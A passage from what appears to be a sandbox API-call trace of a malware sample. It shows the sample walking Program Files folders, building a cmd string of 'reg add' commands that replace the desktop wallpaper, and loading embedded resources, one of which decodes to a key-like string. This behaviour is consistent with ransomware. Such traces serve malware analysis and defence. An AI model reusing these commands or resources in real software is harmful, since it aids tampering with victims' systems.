nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.784] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.784] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.785] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.786] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.786] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.786] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dc322e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.789] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dbbfec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dbbfec0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.790] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.791] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.791] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x820095e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x820095e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x820095e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.792] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.792] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffc0b80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffc0b80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffc0b80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.794] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.794] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801fc020, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8026e440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8026e440, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.799] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.800] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.800] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.806] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f934f00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80163aa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80163aa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.809] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.811] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x800a53c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x800a53c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.825] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.826] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83680580, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83680580, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.831] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7f556b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7f556b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03a0 [0058.832] FindClose (in: hFindFile=0x6a03a0 | out: hFindFile=0x6a03a0) returned 1 [0058.832] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.832] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dcf09c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dcf09c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.833] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dcf09c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7f472300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7f472300, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03a0 [0058.848] FindClose (in: hFindFile=0x6a03a0 | out: hFindFile=0x6a03a0) returned 1 [0058.849] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cfb2f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cfb2f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03a0 [0058.850] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cfb2f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cfb2f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03e0 [0058.851] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7e414bc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7e414bc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0058.859] FindClose (in: hFindFile=0x6a0420 | out: hFindFile=0x6a0420) returned 1 [0058.860] FindClose (in: hFindFile=0x6a03e0 | out: hFindFile=0x6a03e0) returned 1 [0058.860] FindClose (in: hFindFile=0x6a03a0 | out: hFindFile=0x6a03a0) returned 1 [0058.860] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.860] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d5bd20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81d5bd20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.861] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.861] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.862] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x834dd660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x834dd660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03a0 [0058.862] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834dd660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x838234a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x838234a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03e0 [0058.863] FindClose (in: hFindFile=0x6a03e0 | out: hFindFile=0x6a03e0) returned 1 [0058.863] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x834450e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x834450e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03e0 [0058.864] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834450e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0058.869] FindClose (in: hFindFile=0x6a0420 | out: hFindFile=0x6a0420) returned 1 [0058.870] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834450e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83680580, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83680580, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0058.872] FindClose (in: hFindFile=0x6a0420 | out: hFindFile=0x6a0420) returned 1 [0058.873] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83680580, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83680580, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0058.875] FindClose (in: hFindFile=0x6a0420 | out: hFindFile=0x6a0420) returned 1 [0058.876] FindClose (in: hFindFile=0x6a03e0 | out: hFindFile=0x6a03e0) returned 1 [0058.876] FindClose (in: hFindFile=0x6a03a0 | out: hFindFile=0x6a03a0) returned 1 [0058.876] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.876] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.877] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf66ca0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf66ca0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.877] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.879] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.880] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.881] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.881] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.881] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa547efa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xa547efa0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.882] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e0ead20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e0ead20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.882] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03a0 [0058.882] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a03e0 [0058.883] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7b17e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d7b17e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0058.885] FindClose (in: hFindFile=0x6a0420 | out: hFindFile=0x6a0420) returned 1 [0058.886] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7b17e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d7b17e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0058.886] FindClose (in: hFindFile=0x6a0420 | out: hFindFile=0x6a0420) returned 1 [0058.887] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0058.887] FindClose (in: hFindFile=0x6a0420 | out: hFindFile=0x6a0420) returned 1 [0058.887] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d86fec0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0420 [0060.030] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f5cf24, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.034] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26bf7fc, cbMultiByte=228, lpWideCharStr=0x18eaf0, cchWideChar=2047 | out: lpWideCharStr="/C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 228 [0060.034] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f5cf24, csidl=37, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0060.034] FindResourceW (hModule=0x400000, lpName="WALL", lpType=0xa) returned 0x4f54e0 [0060.034] LoadResource (hModule=0x400000, hResInfo=0x4f54e0) returned 0x528e78 [0060.034] SizeofResource (hModule=0x400000, hResInfo=0x4f54e0) returned 0x1493e [0060.034] LockResource (hResData=0x528e78) returned 0x528e78 [0060.035] FreeResource (hResData=0x528e78) returned 0 [0060.035] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0060.035] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0060.035] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0060.035] LockResource (hResData=0x526358) returned 0x526358 [0060.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0060.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x1f9e98c, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 